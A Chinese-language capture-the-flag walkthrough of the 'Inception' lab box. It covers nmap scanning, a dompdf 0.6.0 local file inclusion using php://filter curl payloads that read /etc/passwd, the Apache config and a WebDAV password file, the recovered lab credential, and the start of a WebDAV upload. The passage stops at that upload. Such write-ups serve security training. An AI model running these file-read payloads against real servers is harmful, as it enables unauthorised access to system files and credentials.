1 扫描
80进网页信息搜集,
3128是代理访问端口,要想到后面可能要利用这个设置代理,连接靶机不对外的端口等。
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
2 http信息搜集
dirbuster扫目录没有价值发现
邮箱那里想burp抓包也发现抓不了,什么鬼
看前端源码ctrl+u
,不细看可能还不能发现可以下拉。。拉到最底部,有新目录提示
看version版本,搜漏洞
0.6.0
3 LFI漏洞
根据漏洞提示进行lfi。先试试经典的/etc/passwd
http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
以及因为我们从nmap里扫出这个http服务器是apache,apache的配置文件lfi读取可以参考这个靶机kioptrix5,里面也给了参考网站查询这里
也就是/etc/apache2/sites-enabled/000-default.conf
但是我一连接,就是下载pdf,然后这个pdf打开后还不能滑动,只能看一部分加密内容。。什么鬼
所以查看内容,全部改用curl
curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
curl 10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf
这下就在终端里显示出完整的加密码了,看着就是base,拉去解密,读出,可知有个 cobb
用户
以及查apache那个,出现了webdav的配置目录和里面的密码。webdav网上科普也有很多,这篇靶机granny也有类似的工具利用
再继续查。拿到密码。解密
curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd
webdav_tester:babygurl69
4 webdav利用
然后参考granny那篇靶机的工具利用,进行put上传。随便put
传张图片,可以读取看到,ok
C:\root> cadaver
dav:!> open http://10.10.10.67/webdav_test_inception
Authentication required for webdav test credential on server `10.10.10.67':
Username: webdav_tester
Password:
dav:/webdav_test_inception/> ls
Listing collection `/webdav_test_inception/': succeeded.
webdav.passwd 52 Nov 8 2017
dav:/webdav_test_inception/> put long.jpg
Uploading